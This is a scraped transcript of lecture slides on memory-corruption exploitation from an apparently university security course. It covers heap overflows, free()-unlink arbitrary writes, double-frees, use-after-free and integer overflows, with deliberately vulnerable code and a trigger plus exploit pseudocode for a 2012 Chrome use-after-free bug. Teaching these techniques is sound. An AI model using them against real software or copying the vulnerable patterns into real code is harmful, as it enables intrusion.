yet more buffer overflowscr4bd/4630/s2017/... · 3/20/2017 · lasttime:targetsforpointers...
TRANSCRIPT
![Page 1: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/1.jpg)
Yet More Buffer Overflows
1
![Page 2: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/2.jpg)
Changelog
Corrections made in this version not in first posting:1 April 2017: slide 41: a few more %c’s would be needed to skip formatstring part
1
![Page 3: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/3.jpg)
last time: pointer subterfuge
“pointer subterfuge”
overwrite a pointer
overwritten pointer used to overwrite/access somewhere else
many ways this translates into exploit
3
![Page 4: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/4.jpg)
last time: targets for pointers
many “targets” for attackerchange important data directlychange return addresses, then have return happenchange function pointer, then have it called
typically: rely on code address being used soonsame as stack smashing — but not necessairily return address
which is used — depends on contextdifferent situations will make different ones easier/possible
4
![Page 5: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/5.jpg)
last time: frame pointer overwrite
way off-by-one errors were a problem
many idea: frame pointer often next to buffer
frame pointer used to locate return address
changing frame pointer effectively changes return address
5
![Page 6: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/6.jpg)
beyond normal buffer overflows
pretty much every memory error is a problem
will look at exploiting:
off-by-one buffer overflows (!)
heap buffer overflows
double-frees
use-after-free
integer overflows in size calculations6
![Page 7: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/7.jpg)
beyond normal buffer overflows
pretty much every memory error is a problem
will look at exploiting:
off-by-one buffer overflows (!)
heap buffer overflows
double-frees
use-after-free
integer overflows in size calculations7
![Page 8: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/8.jpg)
easy heap overflows
struct foo {char buffer[100];void (*func_ptr)(void);
};
incr
easin
gad
dres
ses
buffer
func_ptr
8
![Page 9: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/9.jpg)
heap overflow: adjacent allocations
class V {char buffer[100];
public:virtual void ...;...
};...V *first = new V(...);V *second = new V(...);strcpy(first−>buffer,
attacker_controlled);
the heap
incr
easin
gad
dres
ses second’s buffer
second’s vtable
first’s buffer
first’s vtable
result ofoverflowingbuffer
9
![Page 10: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/10.jpg)
heap overflow: adjacent allocations
class V {char buffer[100];
public:virtual void ...;...
};...V *first = new V(...);V *second = new V(...);strcpy(first−>buffer,
attacker_controlled);
the heap
incr
easin
gad
dres
ses second’s buffer
second’s vtable
first’s buffer
first’s vtable
result ofoverflowingbuffer
9
![Page 11: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/11.jpg)
heap smashing
“lucky” adjancent objects
same things possible on stack
but stack overflows had nice generic “stack smashing”
is there an equivalent for the heap?
yes (mostly)
10
![Page 12: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/12.jpg)
diversion: implementing malloc/new
many ways to implement malloc/new
we will talk about one common technique
11
![Page 13: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/13.jpg)
heap object
struct AllocInfo {bool free;int size;AllocInfo *prev;AllocInfo *next;
};
free space(deleted obj.)
nextprev
size/free
new’d object
size/free
free space
nextprev
size/free
free free space
nextprev
size/free
12
![Page 14: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/14.jpg)
implementing free()
int free(void *object) {...block_after = object + object_size;if (block_after−>free) {
/* unlink from list */new_block−>size += block_after−>size;block_after−>prev−>next = block_after−>next;block_after−>next−>prev = block_after−>prev;
}...
}
arbitrary memory write
13
![Page 15: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/15.jpg)
implementing free()
int free(void *object) {...block_after = object + object_size;if (block_after−>free) {
/* unlink from list */new_block−>size += block_after−>size;block_after−>prev−>next = block_after−>next;block_after−>next−>prev = block_after−>prev;
}...
}
arbitrary memory write13
![Page 16: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/16.jpg)
vulnerable code
char *buffer = malloc(100);...strcpy(buffer, attacker_supplied);...free(buffer);free(other_thing);...
free space
nextprev
size/free
alloc’d object
size/free
free space
nextprev
size/free
GOT entry: freeGOT entry: mallocGOT entry: printfGOT entry: fopen
shellcode(or system()?)
size/freeprevnext
14
![Page 17: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/17.jpg)
vulnerable code
char *buffer = malloc(100);...strcpy(buffer, attacker_supplied);...free(buffer);free(other_thing);...
free space
nextprev
size/free
alloc’d object
size/free
free space
nextprev
size/free
GOT entry: freeGOT entry: mallocGOT entry: printfGOT entry: fopen
shellcode(or system()?)
size/freeprevnext
14
![Page 18: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/18.jpg)
vulnerable code
char *buffer = malloc(100);...strcpy(buffer, attacker_supplied);...free(buffer);free(other_thing);...
free space
nextprev
size/free
alloc’d object
size/free
free space
nextprev
size/free
GOT entry: freeGOT entry: mallocGOT entry: printfGOT entry: fopen
shellcode(or system()?)
size/freeprevnext
14
![Page 19: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/19.jpg)
beyond normal buffer overflows
pretty much every memory error is a problem
will look at exploiting:
off-by-one buffer overflows (!)
heap buffer overflows
double-frees
use-after-free
integer overflows in size calculations15
![Page 20: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/20.jpg)
double-frees
free(thing);free(thing);char *p = malloc(...);// p points to next/prev// on list of avail.// blocksstrcpy(p, attacker_controlled);malloc(...);char *q = malloc(...);// q points to attacker-// chosen addressstrcpy(q, attacker_controlled2);...
free space
nextprevsize
alloc’d object
sizealloc’d object
thing
prevnext
size
malloc returns something still on free listbecause double-free made loop in linked list
16
![Page 21: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/21.jpg)
double-frees
free(thing);free(thing);char *p = malloc(...);// p points to next/prev// on list of avail.// blocksstrcpy(p, attacker_controlled);malloc(...);char *q = malloc(...);// q points to attacker-// chosen addressstrcpy(q, attacker_controlled2);...
free space
nextprevsize
alloc’d object
sizealloc’d objectthing/p
prevnext
size
malloc returns something still on free listbecause double-free made loop in linked list
16
![Page 22: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/22.jpg)
double-frees
free(thing);free(thing);char *p = malloc(...);// p points to next/prev// on list of avail.// blocksstrcpy(p, attacker_controlled);malloc(...);char *q = malloc(...);// q points to attacker-// chosen addressstrcpy(q, attacker_controlled2);...
free space
nextprevsize
alloc’d object
sizealloc’d objectthing/p
prevnext
size
malloc returns something still on free listbecause double-free made loop in linked list
16
![Page 23: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/23.jpg)
double-free expansion
// free/delete 1:double_freed−>next = first_free;first_free = chunk;// free/delete 2:double_freed−>next = first_free;first_free = chunk// malloc/new 1:result1 = first_free;first_free = first_free−>next;// + overwrite:strcpy(result1, ...);// malloc/new 2:first_free = first_free−>next;// malloc/new 3:result3 = first_free;strcpy(result3, ...);
next / double free’d object
size
first_free(global)
(original first free)
GOT entry: free
first/second malloc
third malloc
17
![Page 24: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/24.jpg)
double-free expansion
// free/delete 1:double_freed−>next = first_free;first_free = chunk;// free/delete 2:double_freed−>next = first_free;first_free = chunk// malloc/new 1:result1 = first_free;first_free = first_free−>next;// + overwrite:strcpy(result1, ...);// malloc/new 2:first_free = first_free−>next;// malloc/new 3:result3 = first_free;strcpy(result3, ...);
next / double free’d object
size
first_free(global)
(original first free)
GOT entry: free
first/second malloc
third malloc
17
![Page 25: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/25.jpg)
double-free expansion
// free/delete 1:double_freed−>next = first_free;first_free = chunk;// free/delete 2:double_freed−>next = first_free;first_free = chunk// malloc/new 1:result1 = first_free;first_free = first_free−>next;// + overwrite:strcpy(result1, ...);// malloc/new 2:first_free = first_free−>next;// malloc/new 3:result3 = first_free;strcpy(result3, ...);
next / double free’d object
size
first_free(global)
(original first free)
GOT entry: free
first/second malloc
third malloc
17
![Page 26: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/26.jpg)
double-free expansion
// free/delete 1:double_freed−>next = first_free;first_free = chunk;// free/delete 2:double_freed−>next = first_free;first_free = chunk// malloc/new 1:result1 = first_free;first_free = first_free−>next;// + overwrite:strcpy(result1, ...);// malloc/new 2:first_free = first_free−>next;// malloc/new 3:result3 = first_free;strcpy(result3, ...);
next / double free’d object
size
first_free(global)
(original first free)
GOT entry: free
first/second malloc
third malloc
17
![Page 27: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/27.jpg)
double-free expansion
// free/delete 1:double_freed−>next = first_free;first_free = chunk;// free/delete 2:double_freed−>next = first_free;first_free = chunk// malloc/new 1:result1 = first_free;first_free = first_free−>next;// + overwrite:strcpy(result1, ...);// malloc/new 2:first_free = first_free−>next;// malloc/new 3:result3 = first_free;strcpy(result3, ...);
next / double free’d object
size
first_free(global)
(original first free)
GOT entry: free
first/second malloc
third malloc17
![Page 28: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/28.jpg)
double-free notes
this attack has apparently not been possible for a while
most malloc/new’s check for double-frees explicitly(e.g., look for a bit in size data)
prevents this issue — also catches programmer errors
pretty cheap
18
![Page 29: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/29.jpg)
beyond normal buffer overflows
pretty much every memory error is a problem
will look at exploiting:
off-by-one buffer overflows (!)
heap buffer overflows
double-frees
use-after-free
integer overflows in size calculations19
![Page 30: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/30.jpg)
vulnerable codeclass Foo {
...};Foo *the_foo;the_foo = new Foo;...delete the_foo;...something_else = new Bar(...);the_foo−>something();
something_else likely where the_foo was
vtable ptr (Foo)
data for Foo
vtable ptr (Bar)?other data?
data for Bar
20
![Page 31: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/31.jpg)
vulnerable codeclass Foo {
...};Foo *the_foo;the_foo = new Foo;...delete the_foo;...something_else = new Bar(...);the_foo−>something();
something_else likely where the_foo was
vtable ptr (Foo)
data for Foo
vtable ptr (Bar)?other data?
data for Bar
20
![Page 32: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/32.jpg)
C++ inheritence: memory layout
vtable pointerInputStream
vtable pointerSeekableInputStream
vtable pointerfile_pointer
FileInputStream
slot for get slot for getslot for seekslot for tell
FileInputStream::getFileinputStream::seekFileInputStream::tell
21
![Page 33: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/33.jpg)
exploiting use after-free
trigger many “bogus” frees; then
allocate many things of same size with “right” patternpointers to shellcode?pointers to pointers to system()?objects with something useful in VTable entry?
trigger use-after-free thing
22
![Page 34: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/34.jpg)
real UAF exploitable bug
2012 bug in Google Chrome
exploitable via JavaScript
discovered/proof of concept by PinkiePie
allowed arbitrary code execution via VTable manipulation
…despite exploit mitigations (we’ll revisit this later)
23
![Page 35: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/35.jpg)
UAF triggering code
// in HTML near this JavaScript:// <video id="vid"> (video player element)function source_opened() {
buffer = ms.addSourceBuffer('video/webm;␣codecs="vorbis,vp8"');vid.parentNode.removeChild(vid);gc(); // force garbage collector to run now// garbage collector frees unreachable objects// (would be run automatically, eventually, too)// buffer now internally refers to delete'd player objectbuffer.timestampOffset = 42;
}ms = new WebKitMediaSource();ms.addEventListener('webkitsourceopen', source_opened);vid.src = window.URL.createObjectURL(ms);
// implements JavaScript buffer.timestampOffset = 42void SourceBuffer::setTimestampOffset(...) {
if (m_source−>setTimestampOffset(...))...
}bool MediaSource::setTimestampOffset(...) {
// m_player was deleted when video player element deleted// but this call does *not* use a VTableif (!m_player−>sourceSetTimestampOffset(id, offset))
...}bool MediaPlayer::sourceSetTimestampOffset(...) {
// m_private deleted when MediaPlayer deleted// this *is* a VTable-based callreturn m_private−>sourceSetTimestampOffset(id, offset);
}
via https://bugs.chromium.org/p/chromium/issues/detail?id=162835 24
![Page 36: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/36.jpg)
UAF triggering code
// in HTML near this JavaScript:// <video id="vid"> (video player element)function source_opened() {
buffer = ms.addSourceBuffer('video/webm;␣codecs="vorbis,vp8"');vid.parentNode.removeChild(vid);gc(); // force garbage collector to run now// garbage collector frees unreachable objects// (would be run automatically, eventually, too)// buffer now internally refers to delete'd player objectbuffer.timestampOffset = 42;
}ms = new WebKitMediaSource();ms.addEventListener('webkitsourceopen', source_opened);vid.src = window.URL.createObjectURL(ms);
// implements JavaScript buffer.timestampOffset = 42void SourceBuffer::setTimestampOffset(...) {
if (m_source−>setTimestampOffset(...))...
}bool MediaSource::setTimestampOffset(...) {
// m_player was deleted when video player element deleted// but this call does *not* use a VTableif (!m_player−>sourceSetTimestampOffset(id, offset))
...}bool MediaPlayer::sourceSetTimestampOffset(...) {
// m_private deleted when MediaPlayer deleted// this *is* a VTable-based callreturn m_private−>sourceSetTimestampOffset(id, offset);
}
via https://bugs.chromium.org/p/chromium/issues/detail?id=162835 24
![Page 37: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/37.jpg)
UAF triggering code
// in HTML near this JavaScript:// <video id="vid"> (video player element)function source_opened() {
buffer = ms.addSourceBuffer('video/webm;␣codecs="vorbis,vp8"');vid.parentNode.removeChild(vid);gc(); // force garbage collector to run now// garbage collector frees unreachable objects// (would be run automatically, eventually, too)// buffer now internally refers to delete'd player objectbuffer.timestampOffset = 42;
}ms = new WebKitMediaSource();ms.addEventListener('webkitsourceopen', source_opened);vid.src = window.URL.createObjectURL(ms);
// implements JavaScript buffer.timestampOffset = 42void SourceBuffer::setTimestampOffset(...) {
if (m_source−>setTimestampOffset(...))...
}bool MediaSource::setTimestampOffset(...) {
// m_player was deleted when video player element deleted// but this call does *not* use a VTableif (!m_player−>sourceSetTimestampOffset(id, offset))
...}bool MediaPlayer::sourceSetTimestampOffset(...) {
// m_private deleted when MediaPlayer deleted// this *is* a VTable-based callreturn m_private−>sourceSetTimestampOffset(id, offset);
}
via https://bugs.chromium.org/p/chromium/issues/detail?id=162835 24
![Page 38: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/38.jpg)
UAF triggering code
// in HTML near this JavaScript:// <video id="vid"> (video player element)function source_opened() {
buffer = ms.addSourceBuffer('video/webm;␣codecs="vorbis,vp8"');vid.parentNode.removeChild(vid);gc(); // force garbage collector to run now// garbage collector frees unreachable objects// (would be run automatically, eventually, too)// buffer now internally refers to delete'd player objectbuffer.timestampOffset = 42;
}ms = new WebKitMediaSource();ms.addEventListener('webkitsourceopen', source_opened);vid.src = window.URL.createObjectURL(ms);
// implements JavaScript buffer.timestampOffset = 42void SourceBuffer::setTimestampOffset(...) {
if (m_source−>setTimestampOffset(...))...
}bool MediaSource::setTimestampOffset(...) {
// m_player was deleted when video player element deleted// but this call does *not* use a VTableif (!m_player−>sourceSetTimestampOffset(id, offset))
...}bool MediaPlayer::sourceSetTimestampOffset(...) {
// m_private deleted when MediaPlayer deleted// this *is* a VTable-based callreturn m_private−>sourceSetTimestampOffset(id, offset);
}via https://bugs.chromium.org/p/chromium/issues/detail?id=162835 24
![Page 39: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/39.jpg)
UAF triggering code
// in HTML near this JavaScript:// <video id="vid"> (video player element)function source_opened() {
buffer = ms.addSourceBuffer('video/webm;␣codecs="vorbis,vp8"');vid.parentNode.removeChild(vid);gc(); // force garbage collector to run now// garbage collector frees unreachable objects// (would be run automatically, eventually, too)// buffer now internally refers to delete'd player objectbuffer.timestampOffset = 42;
}ms = new WebKitMediaSource();ms.addEventListener('webkitsourceopen', source_opened);vid.src = window.URL.createObjectURL(ms);
// implements JavaScript buffer.timestampOffset = 42void SourceBuffer::setTimestampOffset(...) {
if (m_source−>setTimestampOffset(...))...
}bool MediaSource::setTimestampOffset(...) {
// m_player was deleted when video player element deleted// but this call does *not* use a VTableif (!m_player−>sourceSetTimestampOffset(id, offset))
...}bool MediaPlayer::sourceSetTimestampOffset(...) {
// m_private deleted when MediaPlayer deleted// this *is* a VTable-based callreturn m_private−>sourceSetTimestampOffset(id, offset);
}via https://bugs.chromium.org/p/chromium/issues/detail?id=162835 24
![Page 40: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/40.jpg)
UAF exploit (pseudocode)
... /* use information leaks to find relevant addresses */buffer = ms.addSourceBuffer('video/webm;␣codecs="vorbis,vp8"');vid.parentNode.removeChild(vid);vid = null;gc();// allocate object to replace m_privatevar array = new Uint32Array(168/4);// allocate object to replace m_player// type chosen to keep m_private pointer unchangedrtc = new webkitRTCPeerConnection({'iceServers': []});... /* fill ia with chosen addresses */// trigger VTable Call that uses chosen addressbuffer.timestampOffset = 42;
25
![Page 41: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/41.jpg)
missing pieces: information disclosure
need to learn address to set VTable pointer to
(and other addresses to use)
allocate types other than Uint32Array
rely on confusing between different types, e.g.:
m_private (pointer to PlayerImpl)m_timestampOffset (double)
MediaPlayer (deleted but used)…m_buffer (pointer)
Something (replacement)
26
![Page 42: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/42.jpg)
use-after-free easy cases
common problem for JavaScript implementations
use-after-free’d object often some complex C++ objectexample: representation of video stream
exploits can choose type of object that replacesallocate that kind of object in JS
can often arrange to read/write vtable pointerdepends on layout of thing createdeasy examples: string, array of floating point numbers
27
![Page 43: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/43.jpg)
beyond normal buffer overflows
pretty much every memory error is a problem
will look at exploiting:
off-by-one buffer overflows (!)
heap buffer overflows
double-frees
use-after-free
integer overflows in size calculations28
![Page 44: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/44.jpg)
integer overflow exampleitem *load_items(int len) {
int total_size = len * sizeof(item);if (total_size >= LIMIT) {
return NULL;}item *items = malloc(total_size);for (int i = 0; i < len; ++i) {
int failed = read_item(&items[i]);if (failed) {free(items);return NULL;
}}return items;
}
len = 0x4000 0001sizeof(item) = 0x10
total_size =0x4 0000 0010
29
![Page 45: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/45.jpg)
integer overflow exampleitem *load_items(int len) {
int total_size = len * sizeof(item);if (total_size >= LIMIT) {
return NULL;}item *items = malloc(total_size);for (int i = 0; i < len; ++i) {
int failed = read_item(&items[i]);if (failed) {free(items);return NULL;
}}return items;
}
len = 0x4000 0001sizeof(item) = 0x10
total_size =0x4 0000 0010
29
![Page 46: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/46.jpg)
integer under/overflow: real example
part of another Google Chrome exploit by Pinkie Pie:// In graphics command processing code:uint32 ComputeMaxResults(size_t size_of_buffer) {
return (size_of_buffer − sizeof(uint32)) / sizeof(T);}size_t ComputeSize(size_t num_results) {
return sizeof(T) * num_results + sizeof(uint32);}// exploit: size_of_buffer < sizeof(uint32)
result: write 8 bytes after buffersometimes overwrites data pointer
via https://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html 30
![Page 47: Yet More Buffer Overflowscr4bd/4630/S2017/... · 3/20/2017 · lasttime:targetsforpointers many“targets”forattacker changeimportantdatadirectly changereturnaddresses,thenhavereturnhappen](https://reader036.vdocuments.us/reader036/viewer/2022071105/5fdf2f66127e6c1a45650a11/html5/thumbnails/47.jpg)
special exploits
format string exploits
topic of next homework
31
